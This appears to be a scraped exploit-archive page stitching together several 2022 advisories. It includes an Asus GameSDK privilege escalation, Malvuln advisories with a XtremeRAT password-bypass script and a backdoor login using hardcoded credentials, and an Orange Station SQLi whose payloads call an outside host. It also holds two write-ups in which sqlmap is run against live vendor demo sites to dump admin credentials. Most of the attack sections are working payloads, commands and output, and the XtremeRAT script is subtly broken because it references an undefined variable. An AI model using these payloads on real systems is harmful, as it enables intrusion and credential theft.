Configure SPRYKER_ZED_REQUEST_TOKEN environment variable with a long, <br />random<br />and secure string<br /><br />Disclosure timeline<br />===================<br /><br />2022-04-07: Vulnerability discovered<br />2022-04-07: Initial contact with vendor<br />2022-04-08: Vulnerability reported to vendor<br />2022-04-08: CVE-2022-28888 assigned by MITRE<br />2022-04-11: Vendor notifies customers about vulnerability, releases patch<br />2022-04-26: Requested update from vendor<br />2022-05-05: Requested update from vendor<br />2022-06-20: Notified vendor of intention to publish advisory on 20220-06-30<br />2022-06-22: Vendor confirms that customers were notified about the <br />vulnerability<br />2022-07-12: Advisory published by SCHUTZWERK<br /><br />Contact/Credits<br />===============<br /><br />The vulnerability was discovered during an assessment by David Brown and<br />Marcelo Reyes of SCHUTZWERK GmbH.<br /><br />References<br />==========<br /><br />[0] https://symfony.com<br />[1] https://github.com/silexphp/Silex<br />[2] https://www.ambionics.io/blog/symfony-secret-fragment<br />[3] https://en.wikipedia.org/wiki/Edge_Side_Includes<br />[4] <br />https://github.com/symfony/symfony/blob/ac236517cc8925110d2ec9c35cfdb682a7b82f06/src/Symfony/Component/HttpKernel/EventListener/FragmentListener.php<br />[5] <br />https://github.com/spryker/silexphp/blob/94d2afc9b1ed9662193985cad1ba47da33bdc80d/src/Silex/Provider/HttpFragmentServiceProvider.php#L75<br />[6] <br />https://github.com/spryker/http/blob/56313eaff6594821849846d1b93e0b7eba9a09b6/src/Spryker/Shared/Http/HttpConfig.php#L29<br />[7] <br />https://github.com/spryker/spryker-core/blob/88ab823143b5521b4e1bb1b930321ec39eb4ec1e/Bundles/Http/src/Spryker/Shared/Http/HttpConfig.php#L29<br />[8] https://www.php.net/manual/en/language.constants.magic.php<br />[9] <br 
/>https://docs.spryker.com/docs/scos/dev/setup/installing-spryker-with-development-virtual-machine/installing-spryker-with-devvm-on-macos-and-linux.html<br />[10] https://www.schutzwerk.com/en/43/assets/advisories/find_secret.py<br /><br />Disclaimer<br />==========<br /><br />The information provided in this security advisory is provided "as is" and<br />without warranty of any kind. Details of this security advisory may be <br />updated<br />in order to provide as accurate information as possible. The most recent<br />version of this security advisory can be found at SCHUTZWERK GmbH's website<br />( https://www.schutzwerk.com ).<br /><br /><br />-- <br />SCHUTZWERK GmbH, Pfarrer-Weiß-Weg 12, 89077 Ulm, Germany<br /><br />Phone +49 731 977 191 0<br />Fax +49 731 977 191 99<br />Mobile +49 171 337 2701<br /><br />advisories@schutzwerk.com / www.schutzwerk.com<br /><br />Geschäftsführer / Managing Directors:<br />Jakob Pietzka, Michael Schäfer<br /><br />Amtsgericht Ulm / HRB 727391<br /></code></pre>
<pre><code># Exploit Title: Asus GameSDK v1.0.0.4 - 'GameSDK.exe' Unquoted Service Path (Privilege Escalation)<br /># Date: 07/14/2022<br /># Exploit Author: Angelo Pio Amirante<br /># Version: 1.0.0.4<br /># Tested on: Windows 10<br /># Patched version: 1.0.5.0<br /># CVE: CVE-2022-35899<br /><br /><br /># Steps to discover the unquoted service path:<br /><br />wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows\\" | findstr /i /v """<br /><br /># Info on the service:<br /><br />C:\>sc qc "GameSDK Service"<br />[SC] QueryServiceConfig OPERAZIONI RIUSCITE<br /><br />NOME_SERVIZIO: GameSDK Service<br /> TIPO : 10 WIN32_OWN_PROCESS<br /> TIPO_AVVIO : 2 AUTO_START<br /> CONTROLLO_ERRORE : 1 NORMAL<br /> NOME_PERCORSO_BINARIO : C:\Program Files (x86)\ASUS\GameSDK Service\GameSDK.exe<br /> GRUPPO_ORDINE_CARICAMENTO :<br /> TAG : 0<br /> NOME_VISUALIZZATO : GameSDK Service<br /> DIPENDENZE :<br /> SERVICE_START_NAME : LocalSystem<br /><br /># Exploit<br />If an attacker has already compromised the system and the current user has the privileges to write to the "C:\Program Files (x86)\ASUS\" folder or to "C:\", they could place their own "GameSDK.exe" or "Program.exe" file respectively, and when the service starts, it would launch the malicious file rather than the original "GameSDK.exe".<br /><br /># Impact<br />An attacker can elevate their privileges on the system and become NT AUTHORITY\SYSTEM.<br /><br /># PoC Video<br /><br />https://youtu.be/u_8JMIgn-5g<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/7f314e798c150aedd9ce41ed39318f65_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Builder XtremeRAT v3.7<br />Vulnerability: Insecure Crypto Bypass<br />Description: The malware builds backdoors and requires authentication to access the GUI, using credentials stored in the "user.info" config file. XtremeRAT does not properly validate that saved passwords are what the user actually set when saving them to the user.info config. This allows attackers who can guess the first few characters to pad the rest with zeroes or any other character, provided they guess the password length. The issue appears to be that in Delphi 2009 the default string type changed from ANSI, and the MD5 implementation is not Unicode-aware, so it generates incorrect hashes. Therefore, a user may enter the password "abc123" thinking that it is the exact password which will grant access to the builder. However, the flaw makes it easier for attackers to bypass authentication, as only part of the password is now required and the remainder can be any characters, e.g. abc000. Moreover, the hashing implementation makes no use of a salt. To create a similar password hash for logon, the resulting file size must be 64 bytes, not 32. 
If you just copy and paste a hash into a file you may see it is only 32 bytes, the one generated by XtremeRAT is 64 bytes as it is encoded.<br />Family: Xtreme<br />Type: PE32<br />MD5: 7f314e798c150aedd9ce41ed39318f65<br />Vuln ID: MVID-2022-0624<br />Disclosure: 07/15/2022<br /><br />Exploit/PoC:<br />import os, hashlib<br /><br />#Creates broken unicode MD5 hashes to change an existing XtremeRAT config password.<br />#By malvuln<br />#<br />#=================================================================================<br />#Basically, if the actual password is 'abc123' and was generated by XtremeRAT<br />#we only need to guess 3 out of 6 chars E.g. abc000<br />#as long as we can guess the length we can bypass the need to know the full password.<br />#We can also emulate broken passwords and replace "user.info" config with ours.<br /><br />passwd = u'abc'<br />tmp = hashlib.md5(passwd.encode('utf-16le'))<br /><br />print("[+] XtremeRAT v3.7 ")<br />print("[+] Password hash bypass created")<br />print("[+] By malvuln")<br />print("[-] " +tmp.hexdigest())<br />print("Login using abc000 or any last three chars!")<br /><br />#outputs: ce1473cf80c6b3fda8e3dfc006adc315<br />#HEX: 610062006300<br />#Login using abc000, abc!@# or abc123 it don't matter.<br /><br />XRat_Config="C:\\XtremeRAT_v3.7\\user.info"<br /><br />if os.path.exists(XRat_Config):<br /> os.remove(XRat_Config)<br />f=open(XRat_Config, "w", encoding='utf-16LE')<br />f.write(_hash2)<br />f.close()<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. 
The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/7f314e798c150aedd9ce41ed39318f65.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Builder XtremeRAT v3.7<br />Vulnerability: Insecure Permissions<br />Description: The malware builds and writes a PE file to the C: drive, granting change (C) permissions to the Authenticated Users group. Standard users can rename the executable dropped by the malware to disable it, or replace it with their own executable and then wait for a privileged user to log on to the infected machine to potentially escalate privileges. <br />Family: Xtreme<br />Type: PE32<br />MD5: 7f314e798c150aedd9ce41ed39318f65<br />Vuln ID: MVID-2022-0623<br />Disclosure: 07/15/2022<br /><br />Exploit/PoC:<br />C:\>cacls server.exe<br />C:\server.exe BUILTIN\Administrators:(ID)F<br /> NT AUTHORITY\SYSTEM:(ID)F<br /> BUILTIN\Users:(ID)R<br /> NT AUTHORITY\Authenticated Users:(ID)C<br /><br /><br />C:\>dir server.exe<br /> Volume in drive C has no label.<br /><br /> Directory of C:\<br /><br />03/04/2022 02:56 AM 21,504 server.exe<br /> 1 File(s) 21,504 bytes<br /> 0 Dir(s) 26,072,932,352 bytes free<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. 
Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>Discovery / credits: Malvuln (John Page aka hyp3rlinx) (c) 2022<br />Original source: https://malvuln.com/advisory/e3bb503f9b02cf57341695f30e31128f.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.HoneyPot.a<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on various TCP ports of which one can be port 21 when enabled. Authentication is required, however the credentials "usuario/senha" are weak and found within the PE file.<br />Family: HoneyPot<br />Type: PE32<br />MD5: e3bb503f9b02cf57341695f30e31128f<br />Vuln ID: MVID-2022-0622<br />Disclosure: 07/15/2022<br /><br />Exploit/PoC:<br />'senha' is password in Portuguese<br /><br />C:\>nc64.exe x.x.x.x 21<br />220 Wu-ftpd 1.6.9<br />USER usuario<br />331 Password required for usuario.<br />PASS senha<br />230 User usuario logged in.<br />SYST<br />215 UNIX Type: L8 Internet Component Suite<br />PASV<br />227 Entering Passive Mode (192,168,18,125,218,13).<br />STOR DOOM.exe<br />150 Opening data connection for DOOM.exe.<br />226 File received ok<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. 
The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code>## Title: Orange Station 1.0 SQLi<br />## Author: nu11secur1ty<br />## Date: 0.16.2022<br />## Vendor: https://www.mayurik.com/<br />## Software: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html<br />## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0<br /><br /><br /><br />## Description:<br />The `username` parameter appears to be vulnerable to SQL injection attacks.<br />The attacker can take control of the administrator account and of all other<br />accounts, and can also download all information stored in<br />this system.<br /><br />Status: CRITICAL<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: username (POST)<br /> Type: boolean-based blind<br /> Title: OR boolean-based blind - WHERE or HAVING clause (NOT)<br /> Payload: username=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''<br />OR NOT 8287=8287 AND 'jOHi'='jOHi&password=rootadmin&login=<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=mayuri.infospace@gmail.com'+(select<br />load_file('\\\\kh5oq0o5iyhgxexnhrx8pzcwyn4hs8mwdz1rohc6.beauty.com\\jlb'))+''<br />AND (SELECT 3074 FROM (SELECT(SLEEP(15)))cvLH) AND<br />'yPPS'='yPPS&password=rootadmin&login=<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Orange-Station-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/sz3tfi)<br /><br /><br /></code></pre>
<pre><code>┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : phpjabbers.com │ │ │<br />│ Vendor : PHPJABBERS │ │ Property Listing Script │<br />│ Software : Property Listing Script 3.1 │ │ │<br />│ Vuln Type: Remote SQL Injection │ │ Script will give you │<br />│ Method : GET │ │ the tools to efficiently manage │<br />│ Critical : High [░░▒▒▓▓██] │ │ your own real estate portal │<br />│ Impact : Database Access │ │ │<br />│ │ │ │<br />│ ────────────────────────────────────────┘ └─────────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. 
│<br />│ │<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /> Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk<br /> loool, DevS, Dark-Gost<br /> CryptoJob (Twitter) twitter.com/CryptozJob<br />┌┌────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /><br />Live Demo Site:<br /><br />https://www.phpjabbers.com/property-listing-script/#sectionDemo<br /><br /><br />[INFO] GET parameter 'min_bedrooms' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable<br />GET parameter 'min_bedrooms' is vulnerable.<br /><br />sqlmap identified the following injection point(s) with a total of 414 HTTP(s) requests:<br /><br />---<br />Parameter: min_bedrooms (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861<br />---<br /><br />sqlmap.py -u 
"https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" --current-db --batch --random-agent --threads 5<br /><br />[INFO] the back-end DBMS is MySQL<br />web server operating system: Linux CentOS 6<br />web application technology: Apache 2.2.15<br />back-end DBMS: MySQL >= 5.6<br />[01:13:36] [INFO] fetching current database<br />[01:13:36] [INFO] retrieved: 'pjabbers_demo_pls'<br />current database: 'pjabbers_demo_pls'<br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls --tables --batch --random-agent<br /><br />---<br />Parameter: min_bedrooms (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND 7719=7719 AND (2759=2759<br /><br /> Type: error-based<br /> Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND GTID_SUBSET(CONCAT(0x716b627171,(SELECT (ELT(3030=3030,1))),0x71626a7871),3030) AND (5977=5977<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1) AND (SELECT 2245 FROM (SELECT(SLEEP(5)))iJfC) AND (1861=1861<br />---<br /><br />[INFO] the back-end DBMS is MySQL<br />web server operating system: Linux CentOS 6<br />web application technology: Apache 2.2.15<br />back-end DBMS: MySQL >= 5.6<br />Database: pjabbers_demo_pls<br /><br />[66 tables]<br />+----------------------------------------------------------------+<br />| 1657528735_303_pls_30_property_listing_features |<br />| 1657528735_303_pls_30_property_listing_fields |<br />| 
1657528735_303_pls_30_property_listing_multi_lang |<br />| 1657528735_303_pls_30_property_listing_options |<br />| 1657528735_303_pls_30_property_listing_passwords |<br />| 1657528735_303_pls_30_property_listing_payments |<br />| 1657528735_303_pls_30_property_listing_periods |<br />| 1657528735_303_pls_30_property_listing_plugin_country |<br />| 1657528735_303_pls_30_property_listing_plugin_galleries_set |<br />| 1657528735_303_pls_30_property_listing_plugin_gallery |<br />| 1657528735_303_pls_30_property_listing_plugin_locale_languages |<br />| 1657528735_303_pls_30_property_listing_plugin_locale |<br />| 1657528735_303_pls_30_property_listing_plugin_log_config |<br />| 1657528735_303_pls_30_property_listing_plugin_log |<br />| 1657528735_303_pls_30_property_listing_plugin_one_admin |<br />| 1657528735_303_pls_30_property_listing_plugin_paypal |<br />| 1657528735_303_pls_30_property_listing_plugin_sms |<br />| 1657528735_303_pls_30_property_listing_properties_features |<br />| 1657528735_303_pls_30_property_listing_properties |<br />| 1657528735_303_pls_30_property_listing_roles |<br />| 1657528735_303_pls_30_property_listing_types |<br />| 1657528735_303_pls_30_property_listing_users |<br />| 1657921261_148_pls_30_property_listing_features |<br />| 1657921261_148_pls_30_property_listing_fields |<br />| 1657921261_148_pls_30_property_listing_multi_lang |<br />| 1657921261_148_pls_30_property_listing_options |<br />| 1657921261_148_pls_30_property_listing_passwords |<br />| 1657921261_148_pls_30_property_listing_payments |<br />| 1657921261_148_pls_30_property_listing_periods |<br />| 1657921261_148_pls_30_property_listing_plugin_country |<br />| 1657921261_148_pls_30_property_listing_plugin_galleries_set |<br />| 1657921261_148_pls_30_property_listing_plugin_gallery |<br />| 1657921261_148_pls_30_property_listing_plugin_locale_languages |<br />| 1657921261_148_pls_30_property_listing_plugin_locale |<br />| 1657921261_148_pls_30_property_listing_plugin_log_config 
|<br />| 1657921261_148_pls_30_property_listing_plugin_log |<br />| 1657921261_148_pls_30_property_listing_plugin_one_admin |<br />| 1657921261_148_pls_30_property_listing_plugin_paypal |<br />| 1657921261_148_pls_30_property_listing_plugin_sms |<br />| 1657921261_148_pls_30_property_listing_properties_features |<br />| 1657921261_148_pls_30_property_listing_properties |<br />| 1657921261_148_pls_30_property_listing_roles |<br />| 1657921261_148_pls_30_property_listing_types |<br />| 1657921261_148_pls_30_property_listing_users |<br />| pls_30_property_listing_features |<br />| pls_30_property_listing_fields |<br />| pls_30_property_listing_multi_lang |<br />| pls_30_property_listing_options |<br />| pls_30_property_listing_passwords |<br />| pls_30_property_listing_payments |<br />| pls_30_property_listing_periods |<br />| pls_30_property_listing_plugin_country |<br />| pls_30_property_listing_plugin_galleries_set |<br />| pls_30_property_listing_plugin_gallery |<br />| pls_30_property_listing_plugin_locale |<br />| pls_30_property_listing_plugin_locale_languages |<br />| pls_30_property_listing_plugin_log |<br />| pls_30_property_listing_plugin_log_config |<br />| pls_30_property_listing_plugin_one_admin |<br />| pls_30_property_listing_plugin_paypal |<br />| pls_30_property_listing_plugin_sms |<br />| pls_30_property_listing_properties |<br />| pls_30_property_listing_properties_features |<br />| pls_30_property_listing_roles |<br />| pls_30_property_listing_types |<br />| pls_30_property_listing_users |<br />+----------------------------------------------------------------+<br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users --columns --batch --random-agent<br /><br />fetching columns for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'<br /><br />Database: pjabbers_demo_pls<br 
/>Table: pls_30_property_listing_users<br /><br />[12 columns]<br />+------------+------------------+<br />| Column | Type |<br />+------------+------------------+<br />| created | datetime |<br />| email | varchar(255) |<br />| fax | varchar(255) |<br />| id | int(10) unsigned |<br />| ip | varchar(15) |<br />| is_active | enum('T','F') |<br />| last_login | datetime |<br />| name | varchar(255) |<br />| password | blob |<br />| phone | varchar(255) |<br />| role_id | int(10) unsigned |<br />| status | enum('T','F') |<br />+------------+------------------+<br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657921261_148/preview.php?controller=pjListings&action=pjActionProperties&listing_search=1&min_bedrooms=1" -D pjabbers_demo_pls -T pls_30_property_listing_users -C email,password --dump --batch --random-agent<br /><br />fetching entries of column(s) 'email,password' for table 'pls_30_property_listing_users' in database 'pjabbers_demo_pls'<br /><br />Database: pjabbers_demo_pls<br />Table: pls_30_property_listing_users<br /><br />[1 entry]<br />+-----------------+----------+<br />| email | password |<br />+-----------------+----------+<br />| admin@admin.com | P@S13rd |<br />+-----------------+----------+<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>┌┌────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr │ │ :<br />│ Website : phpjabbers.com │ │ │<br />│ Vendor : PHPJABBERS │ │ Travel Tours Script │<br />│ Software : Travel Tours Script V1.0 │ │ │<br />│ Vuln Type: Remote SQL Injection │ │ A content management solution for │<br />│ Method : GET │ │ travel agencies and tour operators │<br />│ Critical : High [░░▒▒▓▓██] │ │ │<br />│ Impact : Database Access │ │ │<br />│ ─────────────────────────────────────┘ └────────────────────────────────────│<br />│ B4nks-NET irc.b4nks.tk #unix ┌┘<br />└────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ Typically used for remotely exploitable vulnerabilities that can lead to │<br />│ system compromise. 
│<br />│ │<br />┌┌────────────────────────────────────────────────────────────────────────────┐<br />┌┘ Exploit URL's ┌┘<br />└────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Live Demo Site:<br /><br />https://www.phpjabbers.com/travel-tours-script/#sectionDemo<br /><br />POC:<br /><br />https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1'[Injection]<br />GET parameter 'type' is vulnerable<br /><br />---<br />Parameter: type (GET)<br /> Type: boolean-based blind<br /> Title: AND boolean-based blind - WHERE or HAVING clause<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND 8667=8667 AND (4844=4844<br /><br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1) AND (SELECT 7164 FROM (SELECT(SLEEP(5)))loCg) AND (7206=7206<br />---<br /><br />[+] Starting the Attack<br /><br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" --current-db --batch --random-agent --no-cast<br /><br />the back-end DBMS is MySQL<br />web server operating system: Linux CentOS 6<br />web application technology: Apache 2.2.15<br />back-end DBMS: MySQL >= 5.0.12<br />[INFO] fetching current database<br />current database: 'pjabbers_demo_vpl'<br /><br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657840896_841/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl --tables --batch --random-agent --no-cast<br /><br /><br />[INFO] fetching tables for database: 'pjabbers_demo_vpl'<br />[INFO] fetching number of tables for database 'pjabbers_demo_vpl'<br 
/>[INFO] resumed: 52<br /><br />+------------------------------------------+<br />| vacationpackages_comments |<br />| vacationpackages_countries |<br />| vacationpackages_enquiries |<br />| vacationpackages_features |<br />| vacationpackages_fields |<br />| vacationpackages_listings_availabilities |<br />| vacationpackages_listings_features |<br />| vacationpackages_listings |<br />| vacationpackages_multi_lang |<br />| vacationpackages_notifications |<br />| vacationpackages_options |<br />| vacationpackages_payments |<br />| vacationpackages_periods |<br />| vacationpackages_plugin_country |<br />| vacationpackages_plugin_galleries_set |<br />| vacationpackages_plugin_gallery |<br />| vacationpackages_plugin_locale_languages |<br />| vacationpackages_plugin_locale |<br />| vacationpackages_plugin_log_config |<br />| vacationpackages_plugin_log |<br />| vacationpackages_plugin_one_admin |<br />| vacationpackages_plugin_paypal |<br />| vacationpackages_prices |<br />| vacationpackages_roles |<br />| vacationpackages_types |<br />| vacationpackages_users |<br />| vacationpackages_comments |<br />| vacationpackages_countries |<br />| vacationpackages_enquiries |<br />| vacationpackages_features |<br />| vacationpackages_fields |<br />| vacationpackages_listings |<br />| vacationpackages_listings_availabilities |<br />| vacationpackages_listings_features |<br />| vacationpackages_multi_lang |<br />| vacationpackages_notifications |<br />| vacationpackages_options |<br />| vacationpackages_payments |<br />| vacationpackages_periods |<br />| vacationpackages_plugin_country |<br />| vacationpackages_plugin_galleries_set |<br />| vacationpackages_plugin_gallery |<br />| vacationpackages_plugin_locale |<br />| vacationpackages_plugin_locale_languages |<br />| vacationpackages_plugin_log |<br />| vacationpackages_plugin_log_config |<br />| vacationpackages_plugin_one_admin |<br />| vacationpackages_plugin_paypal |<br />| vacationpackages_prices |<br />| 
vacationpackages_roles |<br />| vacationpackages_types |<br />| vacationpackages_users |<br />+------------------------------------------+<br /><br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users --columns --batch --random-agent --threads 5 --no-cast<br /><br />[INFO] fetching columns for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'<br />Database: pjabbers_demo_vpl<br />Table: vacationpackages_users<br />[16 columns]<br /><br />+----------------+--------------------------------------------------------+<br />| Column | Type |<br />+----------------+--------------------------------------------------------+<br />| contact_fax | varchar(255) |<br />| contact_mobile | varchar(255) |<br />| contact_phone | varchar(255) |<br />| contact_title | enum('mr','mrs','miss','ms','dr','prof','rev','other') |<br />| contact_url | varchar(255) |<br />| created | datetime |<br />| email | varchar(255) |<br />| id | int(10) unsigned |<br />| ip | varchar(15) |<br />| is_active | enum('T','F') |<br />| last_login | datetime |<br />| name | varchar(255) |<br />| password | blob |<br />| phone | varchar(255) |<br />| role_id | int(10) unsigned |<br />| status | enum('T','F') |<br />+----------------+--------------------------------------------------------+<br /><br /><br />sqlmap.py -u "https://demo.phpjabbers.com/1657905972_980/front.php?controller=pjListings&action=pjActionListings&listing_search=1&view=list&item_per_page=10&type=1" -D pjabbers_demo_vpl -T vacationpackages_users -C email,password --dump --batch --random-agent --threads 5 --no-cast<br /><br />[INFO] fetching number of column(s) 'email,password' entries for table 'vacationpackages_users' in database 'pjabbers_demo_vpl'<br />Database: pjabbers_demo_vpl<br />Table: vacationpackages_users<br />[1 entry]<br /><br 
/>+-----------------+------------------------+<br />| email | password |<br />+-----------------+------------------------+<br />|admin@admin.com | P@S13rd |<br />+-----------------+------------------------+<br /><br />[-] Done<br /><br /> <br />└─────────────────────────────────────────────────────────────────────────────┘<br /> <br />Greets:<br /> The_PitBull, Raz0r, iNs, Sad, His0k4, Hussin X, Mr. SQL<br /> CryptoJob (Twitter) twitter.com/CryptozJob<br />┌┌────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└────────────────────────────────────────────────────────────────────────────┘┘<br /></code></pre>